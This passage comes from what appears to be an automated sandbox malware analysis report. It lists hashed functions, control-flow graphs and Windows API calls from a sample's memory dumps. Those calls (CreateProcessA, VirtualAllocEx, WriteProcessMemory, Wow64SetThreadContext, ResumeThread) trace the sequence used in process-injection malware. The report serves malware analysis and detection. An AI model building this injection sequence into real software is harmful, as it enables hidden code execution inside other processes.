                                          • Instruction ID: d53f1ee15ac67efba9f5e908a6db1a27e07053f72f6c998e4c14820b819327bd
                                          • Opcode Fuzzy Hash: 1fe1a8c18ba0265e499ddd1b5556aabecffa20db90df25c12d4e21a19b1b073d
                                          • Instruction Fuzzy Hash: F541D6B5E016198FDB08CFAAC58569EFBF2FF88300F18C166D419A7365DB309942CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e7b86ec1aa769163aeeaafebe5a625b93ab3a7e9ed4a94a770d5ba256ab4520
                                          • Instruction ID: e96c404ace28797e5346b61c83bc0cb1a9bf23accf62d9c78ad7340fe680d857
                                          • Opcode Fuzzy Hash: 9e7b86ec1aa769163aeeaafebe5a625b93ab3a7e9ed4a94a770d5ba256ab4520
                                          • Instruction Fuzzy Hash: BD21C5B1E006188BEB18CFABD8447DEFBF2AFC8310F14C16AD409A6254DB741985CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46cb8a000a659c06602702de7cf37d259161cd421fa074472addefc145f5c878
                                          • Instruction ID: 26b02af9417737792bded84474a1fff03e5ce425cf09424243f4ebe1695098fa
                                          • Opcode Fuzzy Hash: 46cb8a000a659c06602702de7cf37d259161cd421fa074472addefc145f5c878
                                          • Instruction Fuzzy Hash: A921B5B1E006189BEB18CFABD8557CEBBF3AFC8314F14C16AE809A6254DB745949CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1043 767b45c-767b464 1044 767b427-767b42d call 767b432 1043->1044 1045 767b466-767b4fd 1043->1045 1044->1043 1049 767b536-767b556 1045->1049 1050 767b4ff-767b509 1045->1050 1055 767b58f-767b5be 1049->1055 1056 767b558-767b562 1049->1056 1050->1049 1051 767b50b-767b50d 1050->1051 1053 767b530-767b533 1051->1053 1054 767b50f-767b519 1051->1054 1053->1049 1057 767b51d-767b52c 1054->1057 1058 767b51b 1054->1058 1066 767b5f7-767b64f 1055->1066 1067 767b5c0-767b5ca 1055->1067 1056->1055 1059 767b564-767b566 1056->1059 1057->1057 1060 767b52e 1057->1060 1058->1057 1061 767b589-767b58c 1059->1061 1062 767b568-767b572 1059->1062 1060->1053 1061->1055 1064 767b576-767b585 1062->1064 1065 767b574 1062->1065 1064->1064 1068 767b587 1064->1068 1065->1064 1077 767b656-767b6b1 CreateProcessA 1066->1077 1067->1066 1069 767b5cc-767b5ce 1067->1069 1068->1061 1071 767b5f1-767b5f4 1069->1071 1072 767b5d0-767b5da 1069->1072 1071->1066 1073 767b5de-767b5ed 1072->1073 1074 767b5dc 1072->1074 1073->1073 1075 767b5ef 1073->1075 1074->1073 1075->1071 1078 767b6b3-767b6b9 1077->1078 1079 767b6ba-767b740 1077->1079 1078->1079 1089 767b742-767b746 1079->1089 1090 767b750-767b754 1079->1090 1089->1090 1091 767b748 1089->1091 1092 767b756-767b75a 1090->1092 1093 767b764-767b768 1090->1093 1091->1090 1092->1093 1094 767b75c 1092->1094 1095 767b76a-767b76e 1093->1095 1096 767b778-767b77c 1093->1096 1094->1093 1095->1096 1099 767b770 1095->1099 1097 767b78e-767b795 1096->1097 1098 767b77e-767b784 1096->1098 1100 767b797-767b7a6 1097->1100 1101 767b7ac 1097->1101 1098->1097 1099->1096 1100->1101 1103 767b7ad 1101->1103 1103->1103
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0767B69E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: a1a09c3d1479108e79a82eeab29acf7f66dd3a3575d88118021f2890292d915e
                                          • Instruction ID: 1abe6fd02faa75f023564b62ecbe51f7bf53ebb23d5888d48aae7f0ef443b142
                                          • Opcode Fuzzy Hash: a1a09c3d1479108e79a82eeab29acf7f66dd3a3575d88118021f2890292d915e
                                          • Instruction Fuzzy Hash: E0A14DF1D00219DFEB24CFA8C8417EDBBB2BF48354F148569E809A7250DB749985CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1104 767b468-767b4fd 1106 767b536-767b556 1104->1106 1107 767b4ff-767b509 1104->1107 1112 767b58f-767b5be 1106->1112 1113 767b558-767b562 1106->1113 1107->1106 1108 767b50b-767b50d 1107->1108 1110 767b530-767b533 1108->1110 1111 767b50f-767b519 1108->1111 1110->1106 1114 767b51d-767b52c 1111->1114 1115 767b51b 1111->1115 1123 767b5f7-767b6b1 CreateProcessA 1112->1123 1124 767b5c0-767b5ca 1112->1124 1113->1112 1116 767b564-767b566 1113->1116 1114->1114 1117 767b52e 1114->1117 1115->1114 1118 767b589-767b58c 1116->1118 1119 767b568-767b572 1116->1119 1117->1110 1118->1112 1121 767b576-767b585 1119->1121 1122 767b574 1119->1122 1121->1121 1125 767b587 1121->1125 1122->1121 1135 767b6b3-767b6b9 1123->1135 1136 767b6ba-767b740 1123->1136 1124->1123 1126 767b5cc-767b5ce 1124->1126 1125->1118 1128 767b5f1-767b5f4 1126->1128 1129 767b5d0-767b5da 1126->1129 1128->1123 1130 767b5de-767b5ed 1129->1130 1131 767b5dc 1129->1131 1130->1130 1132 767b5ef 1130->1132 1131->1130 1132->1128 1135->1136 1146 767b742-767b746 1136->1146 1147 767b750-767b754 1136->1147 1146->1147 1148 767b748 1146->1148 1149 767b756-767b75a 1147->1149 1150 767b764-767b768 1147->1150 1148->1147 1149->1150 1151 767b75c 1149->1151 1152 767b76a-767b76e 1150->1152 1153 767b778-767b77c 1150->1153 1151->1150 1152->1153 1156 767b770 1152->1156 1154 767b78e-767b795 1153->1154 1155 767b77e-767b784 1153->1155 1157 767b797-767b7a6 1154->1157 1158 767b7ac 1154->1158 1155->1154 1156->1153 1157->1158 1160 767b7ad 1158->1160 1160->1160
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0767B69E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: f25f2780cfeaf200c8328387289dce17400568a46c58e171285140218c764f8b
                                          • Instruction ID: fef78e540fbd9a1b78cb7026d36ec950f9b7fd0ac179018730949c3cfa95ab00
                                          • Opcode Fuzzy Hash: f25f2780cfeaf200c8328387289dce17400568a46c58e171285140218c764f8b
                                          • Instruction Fuzzy Hash: C2914DB1D00219DFEF24CFA9C8417DDBBB2BF48354F148569E809A7250DB749985CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1161 e4b1f0-e4b1ff 1162 e4b201-e4b20e call e49bf8 1161->1162 1163 e4b22b-e4b22f 1161->1163 1170 e4b224 1162->1170 1171 e4b210 1162->1171 1164 e4b231-e4b23b 1163->1164 1165 e4b243-e4b284 1163->1165 1164->1165 1172 e4b286-e4b28e 1165->1172 1173 e4b291-e4b29f 1165->1173 1170->1163 1216 e4b216 call e4b488 1171->1216 1217 e4b216 call e4b47b 1171->1217 1172->1173 1174 e4b2a1-e4b2a6 1173->1174 1175 e4b2c3-e4b2c5 1173->1175 1178 e4b2b1 1174->1178 1179 e4b2a8-e4b2af call e4abe4 1174->1179 1177 e4b2c8-e4b2cf 1175->1177 1176 e4b21c-e4b21e 1176->1170 1180 e4b360-e4b420 1176->1180 1181 e4b2d1-e4b2d9 1177->1181 1182 e4b2dc-e4b2e3 1177->1182 1184 e4b2b3-e4b2c1 1178->1184 1179->1184 1211 e4b422-e4b425 1180->1211 1212 e4b428-e4b453 GetModuleHandleW 1180->1212 1181->1182 1185 e4b2e5-e4b2ed 1182->1185 1186 e4b2f0-e4b2f9 call e4abf4 1182->1186 1184->1177 1185->1186 1192 e4b306-e4b30b 1186->1192 1193 e4b2fb-e4b303 1186->1193 1194 e4b30d-e4b314 1192->1194 1195 e4b329-e4b336 1192->1195 1193->1192 1194->1195 1197 e4b316-e4b326 call e4ac04 call e4ac14 1194->1197 1201 e4b338-e4b356 1195->1201 1202 e4b359-e4b35f 1195->1202 1197->1195 1201->1202 1211->1212 1213 e4b455-e4b45b 1212->1213 1214 e4b45c-e4b470 1212->1214 1213->1214 1216->1176 1217->1176
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B446
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 9faba8c377c04808ab3c8a5b0e60eb13fc8440ea79d0d86d66c9117b3cd3630a
                                          • Instruction ID: 4e7aec90914376ee58524f0fb4dccb3905e9bc590eccf0973aa15dd4591e9176
                                          • Opcode Fuzzy Hash: 9faba8c377c04808ab3c8a5b0e60eb13fc8440ea79d0d86d66c9117b3cd3630a
                                          • Instruction Fuzzy Hash: 827148B0A00B058FDB24DF6AE54175ABBF1FF48304F00892EE44AE7A51DB74E945CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00E460C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 879a60b99348ed0b308591a6861ace631088c8be755a6f61adf8d8222ab0cc39
                                          • Instruction ID: f4a58245be3cc7fd71f6db800cbe30ac32eadbbd253c26a64d99c594f5881e47
                                          • Opcode Fuzzy Hash: 879a60b99348ed0b308591a6861ace631088c8be755a6f61adf8d8222ab0cc39
                                          • Instruction Fuzzy Hash: A641CFB0C00719CADB24DFA9C944B9EBBF5BF89304F20806AD408AB261DB75694ACF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00E460C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: a9a26f6c86894f1ed078b7a4e05f28a8506deec33502a7bc25a7d57ba8e31710
                                          • Instruction ID: 2729c9425cfd02f1dfe6ed4bd11498bcee92dff039e6a47e3d719ad9ab5c85cf
                                          • Opcode Fuzzy Hash: a9a26f6c86894f1ed078b7a4e05f28a8506deec33502a7bc25a7d57ba8e31710
                                          • Instruction Fuzzy Hash: 7C41DDB0C00719CBDB24DFAAC884B9EBBF5BF49304F20806AD409BB251DB756949CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0767B270
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: f803a057627401d67e1e0c0385a18e06da03a45777ff2c228354f10d152f015b
                                          • Instruction ID: f0787a932df858ccca115e574d723d4f34e72b6c3b92f6d8a854fb3f045d980b
                                          • Opcode Fuzzy Hash: f803a057627401d67e1e0c0385a18e06da03a45777ff2c228354f10d152f015b
                                          • Instruction Fuzzy Hash: A62146B29003499FCB10CFA9C885BEEBBF5FF48310F14842AE919A7240C7789944DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0767B270
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: c7ade9b49bfd50fd7de4412b9e0c10fea0244b4e2199c21b3cacb59a092e3130
                                          • Instruction ID: f851832a71ae77833ad5ebb2b132a5fdea7601f46e9a9678c92db246d9ff55a0
                                          • Opcode Fuzzy Hash: c7ade9b49bfd50fd7de4412b9e0c10fea0244b4e2199c21b3cacb59a092e3130
                                          • Instruction Fuzzy Hash: 772127B2900359DFDB10CFA9C885BEEBBF5FF48310F14842AE919A7240C7789944DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E4D666,?,?,?,?,?), ref: 00E4D727
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: fa4c3ba8a9a09fec33fd82295959ef0899fba8e7f91806677147f994a960d284
                                          • Instruction ID: 54191038157fb7493c30bd113bee988369c69b15ec1fd7e3d2f60131f50339a8
                                          • Opcode Fuzzy Hash: fa4c3ba8a9a09fec33fd82295959ef0899fba8e7f91806677147f994a960d284
                                          • Instruction Fuzzy Hash: 0C21E5B5904249DFDB10CF9AD984ADEBBF8FB48310F14845AE914B7310D374A950DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767B0C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 5a9b08f35044983fa4a79cd74130a24829fa762d09eb9b2aacffc9e0e64a3ec7
                                          • Instruction ID: 51fd99b32c9db0bddd24fa36ad4988f3ac0e5699a65557eda44f63d4dd7045ef
                                          • Opcode Fuzzy Hash: 5a9b08f35044983fa4a79cd74130a24829fa762d09eb9b2aacffc9e0e64a3ec7
                                          • Instruction Fuzzy Hash: 7C213DB19003099FDB10DFAAC4857EEBBF4EF48310F14842AD419A7241CB789945CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0767B350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: bf8b935d1b5bea0468a3787401b262b91e4e15e42594fb2f86bed51254dba40e
                                          • Instruction ID: f83dd30a4cf8be3454e53790c328d4e247c90b302745c98729d507e5b162b083
                                          • Opcode Fuzzy Hash: bf8b935d1b5bea0468a3787401b262b91e4e15e42594fb2f86bed51254dba40e
                                          • Instruction Fuzzy Hash: A0214AB19002599FDB10CFAAC884AEEFFF4FF48320F14842AE559A7241C7389944DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E4D666,?,?,?,?,?), ref: 00E4D727
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 7c88c7c424532878d2e758192d9f4a372e91fef336432e021d52bd97450f8b42
                                          • Instruction ID: 161310b9fc95b1fac016951015f63205f81e5516061998b2240a6de6afafb038
                                          • Opcode Fuzzy Hash: 7c88c7c424532878d2e758192d9f4a372e91fef336432e021d52bd97450f8b42
                                          • Instruction Fuzzy Hash: F92103B69002489FDB10CFAAD984ADEBFF8EF48320F14805AE914A7351C374A940CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0767B350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: aef9e6129af6ed27b39722f713caf0c4c11fe3d696876c6da6efe9e0f0f63034
                                          • Instruction ID: 2c10e6298aa0bb8d0b2084bb2c48bd7175851b02c1fa16d35a59f69a6b70205f
                                          • Opcode Fuzzy Hash: aef9e6129af6ed27b39722f713caf0c4c11fe3d696876c6da6efe9e0f0f63034
                                          • Instruction Fuzzy Hash: 98213AB1D003599FDB10CFAAC884AEEFBF5FF48320F14842AE519A7240C7349944DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767B0C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 89e78e8aa6b910eaf47bf9b40e0753145eb08f59966637522e7d57b5d2fa0614
                                          • Instruction ID: 25f6753b1888b0b98edb7d55f2068376e5c6ab16f2d5b523e44348ee803956cf
                                          • Opcode Fuzzy Hash: 89e78e8aa6b910eaf47bf9b40e0753145eb08f59966637522e7d57b5d2fa0614
                                          • Instruction Fuzzy Hash: 74212CB1D003098FDB10DFAAC485BEEBBF4EF48314F14842AD519A7241CB789945CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00E4B446
                                            • Part of subcall function 00E4AC40: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E4B4C1,00000800,00000000,00000000), ref: 00E4B6B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          • Opcode ID: e63fd1e5486022335c377f3bcb66dfd00e50e4e94cb9b87cf2e7f82992b4140b
                                          • Instruction ID: 8738f18a7f075102bc010dc47c8539dc00f8be7fc8a354bdfe937c5863c7efb1
                                          • Opcode Fuzzy Hash: e63fd1e5486022335c377f3bcb66dfd00e50e4e94cb9b87cf2e7f82992b4140b
                                          • Instruction Fuzzy Hash: 1311E932A043844FD7219B7AB8513EABFF59FD6324F08845ED159E7153DB749805CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E4B4C1,00000800,00000000,00000000), ref: 00E4B6B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 9f306f2dd012c59075fea3e4b8051ebde0b83b13c242bf83d0166419c481ef05
                                          • Instruction ID: 60f9f01f154eb0d511bbd81a5f85a3165d9d366b6bf2d9c970a84f0868cdf936
                                          • Opcode Fuzzy Hash: 9f306f2dd012c59075fea3e4b8051ebde0b83b13c242bf83d0166419c481ef05
                                          • Instruction Fuzzy Hash: 671114B69002498FDB20CF9AD444ADEFBF8EB88310F15846AD919B7200C375A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0767B18E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 13e8e3030fc3f5bca1aed7519c3256789a55e3fee80040c73becb128d80e1b95
                                          • Instruction ID: c1dae62f0a6047e049788f8fa83c7bc54160d65a8c682bcf7cea329fd633c734
                                          • Opcode Fuzzy Hash: 13e8e3030fc3f5bca1aed7519c3256789a55e3fee80040c73becb128d80e1b95
                                          • Instruction Fuzzy Hash: 7A111AB29002499FDB10DFAAC8446DFBFF5EF48310F148819D519A7250C775A944DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0767B18E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 080b9bd85487c58f577a457793c9a3017edd45aeba550d6e2f87a6643f7d0d7d
                                          • Instruction ID: b2fed14887c6458e83120eecf8f5d22f6f769c9919ff5405efdc23f68a06072f
                                          • Opcode Fuzzy Hash: 080b9bd85487c58f577a457793c9a3017edd45aeba550d6e2f87a6643f7d0d7d
                                          • Instruction Fuzzy Hash: 03114CB29002499FDB20DFAAC844ADFFFF5EF48320F14881AD519A7250CB759944DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E4B4C1,00000800,00000000,00000000), ref: 00E4B6B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: bc54d798d822bd0c644ccc443b92dc17ce447fdb28ccb4f9e2192cf18200c373
                                          • Instruction ID: 25a29f2d5a918cd6304aa7459002b3d3aa5221ae612d3a35fc9bae2e6bce10a0
                                          • Opcode Fuzzy Hash: bc54d798d822bd0c644ccc443b92dc17ce447fdb28ccb4f9e2192cf18200c373
                                          • Instruction Fuzzy Hash: 351112B69002498FDB20CFAAD944ADEFBF4EF88310F15846AD519B7600C375A945CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 83e9728ba5b8481592ccd5de3126c6092becd37b12208181290b77f022e0b1cc
                                          • Instruction ID: deb9f25c796f38ae41949f3d218b6d8d2425127be9f55d430d7962a363191c43
                                          • Opcode Fuzzy Hash: 83e9728ba5b8481592ccd5de3126c6092becd37b12208181290b77f022e0b1cc
                                          • Instruction Fuzzy Hash: 5B115BB19002498FDB20DFAAC4457EFFBF4EF88324F24881AD519A7640CB356944CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0767D379,?,?), ref: 0767D520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: fc35cdb77e684970aa32d1fe0a4373e29dfbda80385d84e1a4f88e225ea6a917
                                          • Instruction ID: 48964fe6fe5161d0b139664d44f6b89bc2318bb4f132d5929d49afb8ebe4fb00
                                          • Opcode Fuzzy Hash: fc35cdb77e684970aa32d1fe0a4373e29dfbda80385d84e1a4f88e225ea6a917
                                          • Instruction Fuzzy Hash: D31143B69002098FDB20DF9AD444BAEBBF4EF48320F10885AD919A7240C738A944CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 539ea5c892d389873ed6d07776e10f6aa4b8295c6639332399f418ba0ba313ed
                                          • Instruction ID: 2effc0db9e0b537d53061244c6b1fcf78b16e79f576afc896ace0b41f6dd3be1
                                          • Opcode Fuzzy Hash: 539ea5c892d389873ed6d07776e10f6aa4b8295c6639332399f418ba0ba313ed
                                          • Instruction Fuzzy Hash: E8113DB19002498FDB24DFAAC4457DEFBF4EF88324F14881AD519A7240CB756944CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0767D379,?,?), ref: 0767D520
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 573746c7dbc1eb1f77de64f7565237464e6e0f1016e922c9344d29e06b28f186
                                          • Instruction ID: 05291ccd06b4824c8d03162f66755ce0a1b8af50a4c25cecf6c9747f999bfd2f
                                          • Opcode Fuzzy Hash: 573746c7dbc1eb1f77de64f7565237464e6e0f1016e922c9344d29e06b28f186
                                          • Instruction Fuzzy Hash: F01166B6800249CFDB20CF9AD445BEEBBF4EF48324F14885AD959A7340C338A944CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
